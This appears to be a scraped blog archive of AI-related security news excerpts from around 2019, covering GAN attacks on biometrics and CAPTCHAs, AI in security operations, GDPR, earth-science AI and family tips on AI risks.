Category Archives: artificial intelligence

Natural Language-Focused AI From OpenAI Shows Promise, Creates Stories With Humor

Is it possible that an AI could exist or will exist in the near future that is too dangerous to release as open source  and should not be uploaded to the

The post Natural Language-Focused AI From OpenAI Shows Promise, Creates Stories With Humor appeared first on The Cyber Security Place.

E Hacking News – Latest Hacker News and IT Security News: Artificial Intelligence To Aid Scientists Understand Earth Better






According to a latest study in the scientific field, computer sciences are all set to collaborate with geography. With the help of Artificial Intelligence complex processes of the planet Earth could now be understood better.

The Friedrich Schiller University’s researchers got behind the books to carry out the aforementioned study, wherein it’s clear that the AI has a lot to contribute to life science.

Climatic conditions and the study of the Earth systems would now become substantially easy to comprehend.

This ability to understand things better would contribute in improving the already existing systems and models on the Earth’s surface.

Before AI got involved, the investigations done regarding the Earth were merely about static elements including the soil properties from a global scale.

More high-tech techniques will now be employed to handle the processes better, all thanks to Artificial Intelligence.

Variations in largely global land processes like photosynthesis could also be now monitored and all the considerations could be deliberated beforehand.


The Earth system data along with a myriad of sensors is now available so that tracking and comprehending the 'Earthian' processes by the aid of AI would now be an easy job.

This new collaboration is very promising element as processes that are beyond human understanding could now be estimated.

Imagine recognition, natural language processing and classical machine learning applications are all that are encompassed within the new techniques available.

Hurricanes, fire spreads and other complex processes leveraged by local conditions are some of the examples for the application.

Soil movement, vegetation dynamics, ocean transport and other basic themes regarding the Earth’s science and systems also lie within the category of the application.

Data dependent statistical techniques no matter how well the data quality, are not always certifiable and hence susceptible to exploitation.

Hence, machine learning needs to an essential part which would also solve the issue regarding storage capacity and data processing.




Physical and mechanical techniques if brought together would absolutely make a huge difference. It would then be possible to model the motion of ocean’s water and to predict the temperature of the sea surface.

According to what one of the researchers behind the study cited, the major motive is bringing together the “best of both worlds”.

In light of this study, warnings regarding natural calamities or any other extreme events including the climatic and weather possibilities would become way easier than ever were.


E Hacking News - Latest Hacker News and IT Security News

Artificial Intelligence To Aid Scientists Understand Earth Better






According to a latest study in the scientific field, computer sciences are all set to collaborate with geography. With the help of Artificial Intelligence complex processes of the planet Earth could now be understood better.

The Friedrich Schiller University’s researchers got behind the books to carry out the aforementioned study, wherein it’s clear that the AI has a lot to contribute to life science.

Climatic conditions and the study of the Earth systems would now become substantially easy to comprehend.

This ability to understand things better would contribute in improving the already existing systems and models on the Earth’s surface.

Before AI got involved, the investigations done regarding the Earth were merely about static elements including the soil properties from a global scale.

More high-tech techniques will now be employed to handle the processes better, all thanks to Artificial Intelligence.

Variations in largely global land processes like photosynthesis could also be now monitored and all the considerations could be deliberated beforehand.


The Earth system data along with a myriad of sensors is now available so that tracking and comprehending the 'Earthian' processes by the aid of AI would now be an easy job.

This new collaboration is very promising element as processes that are beyond human understanding could now be estimated.

Imagine recognition, natural language processing and classical machine learning applications are all that are encompassed within the new techniques available.

Hurricanes, fire spreads and other complex processes leveraged by local conditions are some of the examples for the application.

Soil movement, vegetation dynamics, ocean transport and other basic themes regarding the Earth’s science and systems also lie within the category of the application.

Data dependent statistical techniques no matter how well the data quality, are not always certifiable and hence susceptible to exploitation.

Hence, machine learning needs to an essential part which would also solve the issue regarding storage capacity and data processing.




Physical and mechanical techniques if brought together would absolutely make a huge difference. It would then be possible to model the motion of ocean’s water and to predict the temperature of the sea surface.

According to what one of the researchers behind the study cited, the major motive is bringing together the “best of both worlds”.

In light of this study, warnings regarding natural calamities or any other extreme events including the climatic and weather possibilities would become way easier than ever were.

Website uses Artificial Intelligence to create utterly realistic human faces

By Waqas

A new way for cybercriminals to create fake social media profiles and carry identity scams using Artificial Intelligence powered tool? A couple of months ago it was reported that NVIDIA has developed a tool that uses Artificial Intelligence to create extremely realistic human faces which in reality do not exist. Now, there is a website that […]

This is a post from HackRead.com Read the original post: Website uses Artificial Intelligence to create utterly realistic human faces

Blog | Avast EN: Windows Malware for Macs and More Weekly News | Avast

Phishing scam has fishy URLs

There’s a phishing campaign afoot that tries scamming users into believing their email accounts have been compromised. The phishing email claims multiple verification errors have caused the users’ accounts to be blacklisted and the only fix is an immediate login with the proper credentials. The email provides a link that reads CONFIRM YOUR EMAIL, and when users click on it, they are taken to a fake login page based on their particular email service. If they enter their credentials, the info is sent back to the malware’s C&C (command-and-control server).



Blog | Avast EN

Machine learning fundamentals: What cybersecurity professionals need to know

In this Help Net Security podcast, Chris Morales, Head of Security Analytics at Vectra, talks about machine learning fundamentals, and illustrates what cybersecurity professionals should know. Here’s a transcript of the podcast for your convenience. Hi, this is Chris Morales and I’m Head of Security Analytics at Vectra, and in this Help Net Security podcast I want to talk about machine learning fundamentals that I think we all need to know as cybersecurity professionals. AI … More

The post Machine learning fundamentals: What cybersecurity professionals need to know appeared first on Help Net Security.

Mozilla will use AI coding assistant to preemptively catch Firefox bugs

Mozilla will start using Clever-Commit, an AI coding assistant developed by Ubisoft, to make the Firefox code-writing process more efficient and to prevent the introduction of bugs in the code. How does Clever-Commit work? “By combining data from the bug tracking system and the version control system (aka changes in the code base), Clever-Commit uses artificial intelligence to detect patterns of programming mistakes based on the history of the development of the software. This allows … More

The post Mozilla will use AI coding assistant to preemptively catch Firefox bugs appeared first on Help Net Security.

Nearly two-thirds of organizations say tech skills gap is impacting IT audits

Technologies such as AI are reshaping the future of IT auditors, but auditors are largely optimistic about the future, according to new research from ISACA. In the Future of IT Audit, the results of a survey of more than 2,400 IT auditors worldwide, 92 percent of IT auditors responded that they are optimistic about how technology will impact them professionally over the next five years. Nearly 8 in 10 say their IT audit team has … More

The post Nearly two-thirds of organizations say tech skills gap is impacting IT audits appeared first on Help Net Security.

Are Applications of AI in Cybersecurity Delivering What They Promised?

Many enterprises are using artificial intelligence (AI) technologies as part of their overall security strategy, but results are mixed on the post-deployment usefulness of AI in cybersecurity settings.

This trend is supported by a new white paper from Osterman Research titled “The State of AI in Cybersecurity: The Benefits, Limitations and Evolving Questions.” According to the study, which included responses from 400 organizations with more than 1,000 employees, 73 percent of organizations have implemented security products that incorporate at least some level of AI.

However, 46 percent agree that rules creation and implementation are burdensome, and 25 percent said they do not plan to implement additional AI-enabled security solutions in the future. These findings may indicate that AI is still in the early stages of practical use and its true potential is still to come.

How Effective Is AI in Cybersecurity?

“Any ITDM should approach AI for security very cautiously,” said Steve Tcherchian, chief information security officer (CISO) and director of product at XYPRO Technology. “There are a multitude of security vendors who tout AI capabilities. These make for great presentations, marketing materials and conversations filled with buzz words, but when the rubber meets the road, the advancement in technology just isn’t there in 2019 yet.”

The marketing Tcherchian refers to has certainly drummed up considerable attention, but AI may not yet be delivering enough when it comes to measurable results for security. Respondents to the Osterman Research study noted that the AI technologies they have in place do not help mitigate many of the threats faced by enterprise security teams, including zero-day and advanced threats.

Still Work to Do, but Promise for the Future

While applications of artificial intelligence must still mature for businesses to realize their full benefits, many in the industry still feel the technology offers promise for a variety of applications, such as improving the speed of processing alerts.

“AI has a great potential because security is a moving target, and fixed rule set models will always be evaded as hackers are modifying their attacks,” said Marty Puranik, CEO of Atlantic.Net. “If you have a device that can learn and adapt to new forms of attacks, it will be able to at least keep up with newer types of threats.”

Research from the Ponemon Institute predicted several benefits of AI use, including cost-savings, lower likelihood of data breaches and productivity enhancements. The research found that businesses spent on average around $3 million fighting exploits without AI in place. Those who have AI technology deployed spent an average of $814,873 on the same threats, a savings of more than $2 million.

Help for Overextended Security Teams

AI is also being considered as a potential point of relief for the cybersecurity skills shortage. Many organizations are pinched to find the help they need in security, with Cybersecurity Ventures predicting the skills shortage will increase to 3.5 million unfilled cybersecurity positions by 2021.

AI can help security teams increase efficiency by quickly making sense of all the noise from alerts. This could prove to be invaluable because at least 64 percent of alerts per day are not investigated, according to Enterprise Management Associates (EMA). AI, in tandem with meaningful analytics, can help determine which alerts analysts should investigate and discern valuable information about what is worth prioritizing, freeing security staff to focus on other, more critical tasks.

“It promises great improvements in cybersecurity-related operations, as AI releases security engineers from the necessity to perform repetitive manual processes and provides them with an opportunity and time to improve their skills, learn how to use new tools, technologies,” said Uladzislau Murashka, a certified ethical hacker (CEH) at ScienceSoft.

Note that while AI offers the potential for quicker, more efficient handling of alerts, human intervention will continue to be critical. Applications of artificial intelligence will not replace humans on the security team anytime soon.

Paving an Intelligent Path Forward

It’s important to consider another group that is investing in AI technology and using it for financial gains: cybercriminals. Along with enterprise security managers, those who make a living by exploiting sensitive data also understand the potential AI has for the future. It will be interesting to see how these capabilities play out in the future cat-and-mouse game of cybersecurity.

While AI in cybersecurity is still in the early stages of its evolution, its potential has yet to be fully realized. As security teams continue to invest in and develop AI technologies, these capabilities will someday be an integral part of cyberdefense.

The post Are Applications of AI in Cybersecurity Delivering What They Promised? appeared first on Security Intelligence.

AI, cloud and security — top priorities for enterprise legal departments

A report released today indicates that legal professionals are at the forefront of piloting emerging technologies, such as AI and cloud, in the enterprise. Are you surprised? Legal departments are

The post AI, cloud and security — top priorities for enterprise legal departments appeared first on The Cyber Security Place.

AI won’t solve all of our cybersecurity problems

AI is already supporting businesses with tasks ranging from determining marketing strategies, to driverless cars, to providing personalized film and music recommendations. And its use is expected to grow even further in the coming years. In fact, IDC found that spending on cognitive and AI systems will reach $77.6 billion in 2022, more than three times the $24.0 billion forecast for 2018. But the question remains – can businesses expect AI adoption to effectively protect … More

The post AI won’t solve all of our cybersecurity problems appeared first on Help Net Security.

Can AI Become Our New Cybersecurity Sheriff?

Two hospitals in Ohio and West Virginia turned patients away due to a ransomware attack that led to a system failure. The hospitals could not process any emergency patient requests. Hence,

The post Can AI Become Our New Cybersecurity Sheriff? appeared first on The Cyber Security Place.

Companies getting serious about AI and analytics, 58% are evaluating data science platforms

New O’Reilly research found that 58 percent of today’s companies are either building or evaluating data science platforms – which are essential for companies that are keen on growing their data science teams and machine learning capabilities – while 85 percent of companies already have data infrastructure in the cloud. Companies are building or evaluating solutions in foundational technologies needed to sustain success in analytics and AI. These include data integration and Extract, Transform and … More

The post Companies getting serious about AI and analytics, 58% are evaluating data science platforms appeared first on Help Net Security.

AI May Soon Defeat Biometric Security, Even Facial Recognition Software

It’s time to face a stark reality: Threat actors will soon gain access to artificial intelligence (AI) tools that will enable them to defeat multiple forms of authentication — from passwords to biometric security systems and even facial recognition software — identify targets on networks and evade detection. And they’ll be able to do all of this on a massive scale.

Sounds far-fetched, right? After all, AI is difficult to use, expensive and can only be produced by deep-pocketed research and development labs. Unfortunately, this just isn’t true anymore; we’re now entering an era in which AI is a commodity. Threat actors will soon be able to simply go shopping on the dark web for the AI tools they need to automate new kinds of attacks at unprecedented scales. As I’ll detail below, researchers are already demonstrating how some of this will work.

When Fake Data Looks Real

Understanding the coming wave of AI-powered cyberattacks requires a shift in thinking and AI-based unified endpoint management (UEM) solutions that can help you think outside the box. Many in the cybersecurity industry assume that AI will be used to simulate human users, and that’s true in some cases. But a better way to understand the AI threat is to realize that security systems are based on data. Passwords are data. Biometrics are data. Photos and videos are data — and new AI is coming online that can generate fake data that passes as the real thing.

One of the most challenging AI technologies for security teams is a very new class of algorithms called generative adversarial networks (GANs). In a nutshell, GANs can imitate or simulate any distribution of data, including biometric data.

To oversimplify how GANs work, they involve pitting one neural network against a second neural network in a kind of game. One neural net, the generator, tries to simulate a specific kind of data and the other, the discriminator, judges the first one’s attempts against real data — then informs the generator about the quality of its simulated data. As this progresses, both neural networks learn. The generator gets better at simulating data, and the discriminator gets better at judging the quality of that data. The product of this “contest” is a large amount of fake data produced by the generator that can pass as the real thing.

GANs are best known as the foundational technology behind those deep fake videos that convincingly show people doing or saying things they never did or said. Applied to hacking consumer security systems, GANs have been demonstrated — at least, in theory — to be keys that can unlock a range of biometric security controls.

Machines That Can Prove They’re Human

CAPTCHAs are a form of lightweight website security you’re likely familiar with. By making visitors “prove” they’re human, CAPTCHAs act as a filter to block automated systems from gaining access. One typical kind of CAPTCHA asks users to identify numbers, letters and characters that have been jumbled, distorted and obfuscated. The idea is that humans can pick out the right symbols, but machines can’t.

However, researchers at Northwest University and Peking University in China and Lancaster University in the U.K. claimed to have developed an algorithm based on a GAN that can break most text-based CAPTCHAs within 0.05 seconds. In other words, they’ve trained a machine that can prove it’s human. The researchers concluded that because their technique uses a small number of data points for training the algorithm — around 500 test CAPTCHAs selected from 11 major CAPTCHA services — and both the machine learning part and the cracking part happen very quickly using a single standard desktop PC, CAPTCHAs should no longer be relied upon for front-line website defense.

Faking Fingerprints

One of the oldest tricks in the book is the brute-force password attack. The most commonly used passwords have been well-known for some time, and many people use passwords that can be found in the dictionary. So if an attacker throws a list of common passwords, or the dictionary, at a large number of accounts, they’re going to gain access to some percentage of those targets.

As you might expect, GANs can produce high-quality password guesses. Thanks to this technology, it’s now also possible to launch a brute-force fingerprint attack. Fingerprint identification — like the kind used by major banks to grant access to customer accounts — is no longer safe, at least in theory.

Researchers at New York University and Michigan State University recently conducted a study in which GANs were used to produce fake-but-functional fingerprints that also look convincing to any human. They said their method worked because of a flaw in the way many fingerprint ID systems work. Instead of matching the full fingerprint, most consumer fingerprint systems only try to match a part of the fingerprint.

The GAN approach enables the creation of thousands of fake fingerprints that have the highest likelihood of being matches for the partial fingerprints the authentication software is looking for. Once a large set of high-quality fake fingerprints is produced, it’s basically a brute-force attack using fingerprint patterns instead of passwords. The good news is that many consumer fingerprint sensors use heat or pressure to detect whether an actual human finger is providing the biometric data.

Is Face ID Next?

One of the most outlandish schemes for fooling biometric security involves tricking facial recognition software with fake faces. This was a trivial task with 2D technologies, in part because the capturing of 2D facial data could be done with an ordinary camera, and at some distance without the knowledge of the target. But with the emergence of high-definition 3D technologies found in many smartphones, the task becomes much harder.

A journalist working at Forbes tested four popular Android phones, plus an iPhone, using 3D-printed heads made by a company called Backface in Birmingham, U.K. The studio used 50 cameras and sophisticated software to scan the “victim.” Once a complete 3D image was created, the life-size head was 3D-printed, colored and, finally, placed in front of the various phones.

The results: All four Android phones unlocked with the phony faces, but the iPhone didn’t.

This method is, of course, difficult to pull off in real life because it requires the target to be scanned using a special array of cameras. Or does it? Constructing a 3D head out of a series of 2D photos of a person — extracted from, say, Facebook or some other social network — is exactly the kind of fake data that GANs are great at producing. It won’t surprise me to hear in the next year or two that this same kind of unlocking is accomplished using GAN-processed 2D photos to produce 3D-printed faces that pass as real.

Stay Ahead of the Unknown

Researchers can only demonstrate the AI-based attacks they can imagine — there are probably hundreds or thousands of ways to use AI for cyberattacks that we haven’t yet considered. For example, McAfee Labs predicted that cybercriminals will increasingly use AI-based evasion techniques during cyberattacks.

What we do know is that as we enter into a new age of artificial intelligence being everywhere, we’re also going to see it deployed creatively for the purpose of cybercrime. It’s a futuristic arms race — and your only choice is to stay ahead with leading-edge security based on AI.

The post AI May Soon Defeat Biometric Security, Even Facial Recognition Software appeared first on Security Intelligence.

2019 predictions – the year ahead for cybersecurity

2018 was a roller-coaster year for the tech industry – lots of big court cases and high-profile data privacy disagreements.2018 was a roller-coaster year for the tech industry – lots

The post 2019 predictions – the year ahead for cybersecurity appeared first on The Cyber Security Place.

CIPL Submits Comments to ICDPPC Declaration on Ethics and Data Protection in AI

On January 25, 2019, the Centre for Information Policy Leadership (“CIPL”) at Hunton Andrews Kurth submitted formal comments to the International Conference of Data Protection and Privacy Commissioners (the “International Conference”) on its Declaration on Ethics and Data Protection in Artificial Intelligence (the “Declaration”). The Declaration was adopted by the International Conference on October 23, 2018, for public consultation.

As we previously reported, the Declaration endorses several guiding principles as core values to preserve human rights as artificial intelligence technology develops. CIPL welcomes and shares many of the views expressed by the International Conference with respect to these six guiding principles.

In its comments on the Declaration, CIPL recommends several specific modifications and clarifications to the guiding principles of fairness, continued attention and vigilance and accountability, transparency and intelligibility, responsible design and development, individual empowerment and reducing or mitigating unlawful biases and discriminations.

These comments are intended to assist the newly set up International Conference permanent working group on Ethics and Data Protection in AI as it seeks to establish common governance principles on artificial intelligence at an international level.

To read CIPL’s recommendations on these principles, please view the full paper.

Break Through Cybersecurity Complexity With New Rules, Not More Tools

Let’s be frank: Chief information security officers (CISOs) and security professionals all know cybersecurity complexity is a major challenge in today’s threat landscape. Other folks in the security industry know this too — although some don’t want to admit it. The problem is that amid increasing danger and a growing skills shortage, security teams are overwhelmed by alerts and the growing number of complex tools they have to manage. We need to change that, but how? By completely rethinking our assumptions.

The basic assumption of security up until now is that new threats require new tools. After 12 years at IBM Security, leading marketing teams and making continuous contact with our clients — and, most recently, as VP of product marketing — I’ve seen a lot of promising new technology. But in our rapidly diversifying industry, there are more specialized products to face every kind of threat in an expanding universe of attack vectors. Complexity is a hidden cost of all these marvelous products.

It’s not just security products that contribute to the cybersecurity complexity conundrum; digitization, mobility, cloud and the internet of things (IoT) all contribute to the complexity of IT environments, making security an uphill battle for underresourced security teams. According to Forrester’s “Global Business Technographics Security Survey 2018,” 31 percent of business and IT decision-makers ranked the complexity of the IT environment among the biggest security challenges they face, tied with the changing nature of threats as the most-cited challenge.

I’ll give you one more mind-boggling statistic to demonstrate why complexity is the enemy of security: According to IBM estimates, enterprises use as many as 80 different security products from 40 vendors. Imagine trying to build a clear picture with pieces from 80 separate puzzles. That’s what CISOs and security operations teams are being asked to do.

7 Rules to Help CISOs Reduce Cybersecurity Complexity

The sum of the parts is not greater than the whole. So, we need to escape the best-of-breed trap to handle the problem of complexity. Cybersecurity doesn’t need more tools; it needs new rules.

Complexity requires us as security professionals and industry partners to turn the old ways of thinking inside out and bring in fresh perspectives.

Below are seven rules to help us think in new ways about the complex, evolving challenges that CISOs, security teams and their organizations face today.

1. Open Equals Closed

You can’t prevent security threats by piling on more tools that don’t talk to each other and create more noise for overwhelmed analysts. Security products need to work in concert, and that requires integration and collaboration. An open, connected, cloud-based security platform that brings security products together closes the gaps that point products leave in your defenses.

2. See More When You See Less

Security operations centers (SOCs) see thousands of security events every day — a 2018 survey of 179 IT professionals found that 55 percent of respondents handle more than 10,000 alerts per day, and 27 percent handle more than 1 million events per day. SOC analysts can’t handle that volume.

According to the same survey, one-third of IT professionals simply ignore certain categories of alerts or turn them off altogether. A smarter approach to the overwhelming volume of alerts leverages analytics and artificial intelligence (AI) so SOC analysts can focus on the most crucial threats first, rather than chase every security event they see.

3. An Hour Takes a Minute

When you find a security incident that requires deeper investigation, time is of the essence. Analysts can’t afford to get bogged down in searching for information in a sea of threats.

Human intelligence augmented by AI — what IBM calls cognitive security — allows SOC analysts to respond to threats up to 60 times faster. An advanced AI can understand, reason and learn from structured and unstructured data, such as news articles, blogs and research papers, in seconds. By automating mundane tasks, analysts are freed to make critical decisions for faster response and mitigation.

4. A Skills Shortage Is an Abundance

It’s no secret that greater demand for cybersecurity professionals and an inadequate pipeline of traditionally trained candidates has led to a growing skills gap. Meanwhile, cybercriminals have grown increasingly collaborative, but those who work to defend against them remain largely siloed. Collaboration platforms for security teams and shared threat intelligence between vendors are force multipliers for your team.

5. Getting Hacked Is an Advantage

If you’re not seeking out and patching vulnerabilities in your network and applications, you’re making an assumption that what you don’t know can’t hurt you. Ethical hacking and penetration testing turns hacking into an advantage, helping you find your vulnerabilities before adversaries do.

6. Compliance Is Liberating

More and more consumers say they will refuse to buy products from companies that they don’t trust to protect their data, no matter how great the products are. By creating a culture of proactive data compliance, you can exchange the checkbox mentality for continuous compliance, turning security into a competitive advantage.

7. Rigidity Is Breakthrough

The success of your business depends not only on customer loyalty, but also employee productivity. Balance security with productivity by practicing strong security hygiene. Run rigid but silent security processes in the background to stay out of the way of productivity.

What’s the bottom line here? Times are changing, and the current trend toward complexity will slow the business down, cost too much and fail to reduce cyber risk. It’s time to break through cybersecurity complexity and write new rules for a new era.

Discover Outcome-driven security solutions for the enterprise

The post Break Through Cybersecurity Complexity With New Rules, Not More Tools appeared first on Security Intelligence.

Hunton Briefing Reflects on GDPR Implementation and Future Challenges

On January 16, 2019, Hunton Andrews Kurth hosted a breakfast seminar in London, entitled “GDPR: Post Implementation Review.” Bridget Treacy, Aaron Simpson and James Henderson from Hunton Andrews Kurth and Bojana Bellamy from the Centre for Information Policy Leadership (“CIPL”) at Hunton Andrews Kurth discussed some of the challenges and successes companies encountered in implementing the EU General Data Protection Regulation (the “GDPR”), and also identified key data protection challenges that lie ahead. The Hunton team was joined by Neil Paterson, Group Data Protection Coordinator of TUI Group; Miles Briggs, Data Protection Officer of TUI UK & Ireland; and Vivienne Artz, Chief Privacy Officer at Refinitiv, who provided an in-house perspective on the GDPR.

The briefing provided an opportunity for companies (the “Companies”) to reflect on their achievements so far and to benchmark their GDPR experiences ahead of Data Protection Day, which is on January 28, 2019. A main takeaway of the day was that building a business friendly privacy environment is an ongoing process that must be viewed from a global perspective.

We have summarized below some of the key discussion points from the seminar.

GDPR Implementation Insights

  • Generally Satisfied with Compliance: While the Companies were reasonably satisfied with the bulk of their GDPR implementation work and are now engaged in fine-tuning their data protection compliance programs, the Companies recognized that a number of challenges remain.
  • Global Privacy Challenges: Data Protection Officers are seeking to move their companies toward sustainable privacy programs that ensure GDPR compliance, yet also address global privacy challenges beyond the GDPR. The Companies view GDPR compliance as important, but not an end in itself, at least not given recent developments in other parts of the world, such as India, Brazil, etc. The Companies recognize privacy as the new normal, and are working to build efficient programs to address privacy challenges at an international level.
  • Maintaining a Culture of Privacy Awareness: Maintaining and developing a culture of privacy awareness within their companies is a key concern for privacy leaders. Some business leaders viewed the GDPR as a completed task once the implementation date of May 25, 2018, had passed, rather than an ongoing responsibility; and privacy leaders have been working hard to correct this view.
  • Territorial Scope: Many of the Companies have struggled to interpret the territorial scope of the GDPR. Insights from the European Data Protection Board’s Guidelines on Territorial Scope (3/2018), published in November 2018, have helped to clarify the position on topics such as the location of the protected data subjects, the use of non-EU based processors and the nature of a non-EU processor’s obligations.
  • Data Processing Agreements: Implementing Article 28 requirements continues to challenge the Companies, with a broad range of positions being adopted when negotiating data processing agreements. Negotiating liability caps and exclusions can be complex, due in part to the risk of reopening broader liability and other contractual issues. It will likely take some time for market practice to evolve.
  • Increased Training and Tech-enabled Compliance Tools: The Companies mentioned that, in the year ahead, conducting data protection training and awareness programs and rolling out tech-enabled compliance tools (e.g., for DPIAs and DSARs) will play a key part in enabling ongoing compliance with the GDPR.
  • GDPR and Future Privacy Challenges: The Companies stressed the difficulties encountered in interpreting and implementing GDPR obligations in the context of artificial intelligence, machine learning and the big data challenges of tomorrow. Companies will need to find innovative ways to accommodate big data while respecting data subject rights.

Regulatory Perspective

  • Increase in Complaints and Breach Reporting: As expected, data protection authorities (“DPAs”) have already been required to deal with a significant volume of complaints (on one report, 42,230 throughout the EU), and reports of data breaches (some 500 per week in the UK in the first few weeks after the GDPR took effect). Breach notifications across EU Member States have reached levels that are barely sustainable for most EU regulators. This is a consequence of the low notification threshold set by the GDPR, and of organizations adopting a very conservative approach towards notification. The ICO has reminded organizations that not all data breaches need to be reported. Other DPAs have a differing view, pointing to the need for more comprehensive guidance on this topic.
  • Inconsistency across Member States: There are already examples of inconsistent approaches by EU DPAs in relation to the implementation of the GDPR framework. Perhaps the starkest example of this is the 21 separate DPIA frameworks adopted at a national level. Staffing levels between DPAs differ, and differences in enforcement strategy are also likely. It will take time for differences to be reconciled, and in some areas, they will remain. Just as companies require time to embed and fine tune their implementation of the GDPR, regulators will also require time to adjust to the new regulatory environment.

Future Challenges

  • Moving Beyond Local Compliance to Global Privacy Accountability: Privacy frameworks are evolving and organizations face the challenge of moving their focus from local legal compliance to implementing a global operational privacy framework. The GDPR is now viewed as a template by countries seeking to craft new privacy laws. It offers a major step forward towards an operational privacy framework, but global privacy accountability will remain a challenge.
  • Local Challenges: Privacy leaders aspire to ensure that at every level of their organization, staff recognize the privacy issues raised by each decision, and assess the privacy risk for affected data subjects.
  • Future Challenges: Major legal challenges highlighted by participants included Brexit, the e-Privacy Regulation and the likelihood of legal challenges under the GDPR.

Hunton is hosting its next seminar in its London office on “Practical Insights on the Design and Implementation of Data Protection Impact Assessments,” on March 6, 2019.

National Data Privacy Day Is Wishful Thinking

You have to have a supreme sense of irony, or be in major denial, to call Monday, Jan. 28, Data Privacy Day. Given the current state of big data collection

The post National Data Privacy Day Is Wishful Thinking appeared first on The Cyber Security Place.

Is AI the Answer to never-ending Cybersecurity Problems?

Paul German, CEO, Certes Networks, talks about the impact and the benefits of Artificial Intelligence(AI) driven cybersecurity. And how AI adoption is helping organisations to stay ahead in the never-ending game that is cybersecurity.

Artificial Intelligence (AI) isn’t going anywhere anytime soon. With 20% of the C-suite already using machine learning and 41% of consumers believing that AI will improve their lives, wide scale adoption is imminent across every industry - and cybersecurity is no exception. A lot has changed in the cyber landscape over the past few years and AI is being pushed to the forefront of conversations. It’s becoming more than a buzzword and delivering true business value. Its ability to aid the cybersecurity industry is increasingly being debated; some argue it has the potential to revolutionise cybersecurity, whilst others insist that the drawbacks outweigh the benefits.

With several issues facing the current cybersecurity landscape such as a disappearing IT perimeter, a widening skills gap, increasingly sophisticated cyber attacks and data breaches continuing to hit headlines, a remedy is needed. The nature of stolen data has also changed - CVV and passport numbers are becoming compromised, so coupled with regulations such as GDPR, organisations are facing a minefield.

Research shows that 60% think AI has the ability to find attacks before they do damage. But is AI the answer to the never-ending cybersecurity problems facing organisations today?

The Cost-Benefit Conundrum
On one hand, AI could provide an extremely large benefit to the overall framework of cybersecurity defences. On the other, the reality that it equally has the potential to be a danger under certain conditions cannot be ignored. Hackers are fast gaining the ability to foil security algorithms by targeting the data AI technology is training on. Inevitably, this could have devastating consequences.

AI can be deployed by both sides - by the attackers and the defenders. It does have a number of benefits such as the ability to learn and adapt to its current learning environment and the threat landscape. If it was deployed correctly, AI could consistently collect intelligence about new threats, attempted attacks, successful data breaches, blocked or failed attacks and learn from it all, fulfilling its purpose of defending the digital assets of an organisation. By immediately reacting to attempted breaches, mitigating and addressing the threat, cybersecurity could truly reach the next level as the technology would be constantly learning to detect and protect.

Additionally, AI technology has the ability to pick up abnormalities within an organisation’s network and flag it quicker than a member of the cybersecurity or IT team could; AI’s ability to understand ‘normal’ behaviour would allow it to bring attention to potentially malicious behaviour of suspicious or abnormal user or device activity.

As with most new technologies, for each positive there is an equal negative. AI could be configured by hackers to learn the specific defences and tools that it runs up against which would give way to larger and more successful data breaches. Viruses could be created to host this type of AI, producing more malware that can bypass even more advanced security implementations. This approach would likely be favoured by hackers as they don’t even need to tamper with the data itself - they could work out the features of the code a model is using and mirror it with their own. In this particular care, the tables would be turned and organisations could find themselves in sticky situations if they can’t keep up with hackers.

Organisations must be wary that they don’t adopt AI technology in cybersecurity ‘just because.’ As attack surfaces expand and hackers become more sophisticated, cybersecurity strategies must evolve to keep up. AI contributes to this expanding attack surface so when it comes down to deployment, the benefits must be weighed up against the potential negatives. A robust, defence-in-depth Information Assurance strategy is still needed to form the basis of any defence strategy to keep data safe.



Paul German, CEO, Certes Networks

Machine learning trumps AI for security analysts

While machine learning is one of the biggest buzzwords in cybersecurity and the tech industry in general, the phrase itself is often overused and mis-applied, leaving many to have their own, incorrect definition of what machine learning actually is. So, how do you cut through all the noise to separate fact from fiction? And how can this tool be best applied to security operations? What is machine learning? Machine learning (ML) is an algorithm that … More

The post Machine learning trumps AI for security analysts appeared first on Help Net Security.

McAfee Blogs: Artificial Intelligence & Your Family: The Wows & the Risks

artificial intelligenceAm I the only one? When I hear or see the word Artificial Intelligence (AI), my mind instantly defaults to images from sci-fi movies I’ve seen like I, Robot, Matrix, and Ex Machina. There’s always been a futuristic element — and self-imposed distance — between AI and myself.

But AI is anything but futuristic or distant. AI is here, and it’s now. And, we’re using it in ways we may not even realize.

AI has been woven throughout our lives for years in various expressions of technology. AI is in our homes, workplaces, and our hands every day via our smartphones.

Just a few everyday examples of AI:

  • Cell phones with built-in smart assistants
  • Toys that listen and respond to children
  • Social networks that determine what content you see
  • Social networking apps with fun filters
  • GPS apps that help you get where you need to go
  • Movie apps that predict what show you’d enjoy next
  • Music apps that curate playlists that echo your taste
  • Video games that deploy bots to play against you
  • Advertisers who follow you online with targeted ads
  • Refrigerators that alert you when food is about to expire
  • Home assistants that carry out voice commands
  • Flights you take that operate via an AI autopilot

The Technology

While AI sounds a little intimidating, it’s not when you break it down. AI is technology that can be programmed to accomplish a specific set of goals without assistance. In short, it’s a computer’s ability to be predictive — to process data, evaluate it, and take action.

AI is being implemented in education, business, manufacturing, retail, transportation, and just about any other sector of industry and culture you can imagine. It’s the smarter, faster, more profitable way to accomplish manual tasks.

An there’s tons of AI-generated good going on. Instagram — the #2 most popular social network — is now using AI technology to detect and combat cyberbullying on in both comments and photos.

No doubt, AI is having a significant impact on everyday life and is positioned to transform the future.

Still, there are concerns. The self-driving cars. The robots that malfunction. The potential jobs lost to AI robots.

So, as quickly as this popular new technology is being applied, now is a great time to talk with your family about both the exciting potential of AI and the risks that may come with it.

Talking points for families

Fake videos, images. AI is making it easier for people to face swap within images and videos. A desktop application called FakeApp allows users to seamlessly swap faces and share fake videos and images. This has led to the rise in “deep fake” videos that appear remarkably realistic (many of which go viral). Tip: Talk to your family about the power of AI technology and the responsibility and critical thinking they must exercise as they consume and share online content.

Privacy breaches. Following the Cambridge Analytica/Facebook scandal of 2018 that allegedly used AI technology unethically to collect Facebook user data, we’re reminded of those out to gather our private (and public) information for financial or political gain. Tip: Discuss locking down privacy settings on social networks and encourage your kids to be hyper mindful about the information they share in the public feed. That information includes liking and commenting on other content — all of which AI technology can piece together into a broader digital picture for misuse.

Cybercrime. As outlined in McAfee’s 2019 Threats Prediction Report, AI technology will likely allow hackers more ease to bypass security measures on networks undetected. This can lead to data breaches, malware attacks, ransomware, and other criminal activity. Additionally, AI-generated phishing emails are scamming people into handing over sensitive data. Tip: Bogus emails can be highly personalized and trick intelligent users into clicking malicious links. Discuss the sophistication of the AI-related scams and warn your family to think about every click — even those from friends.

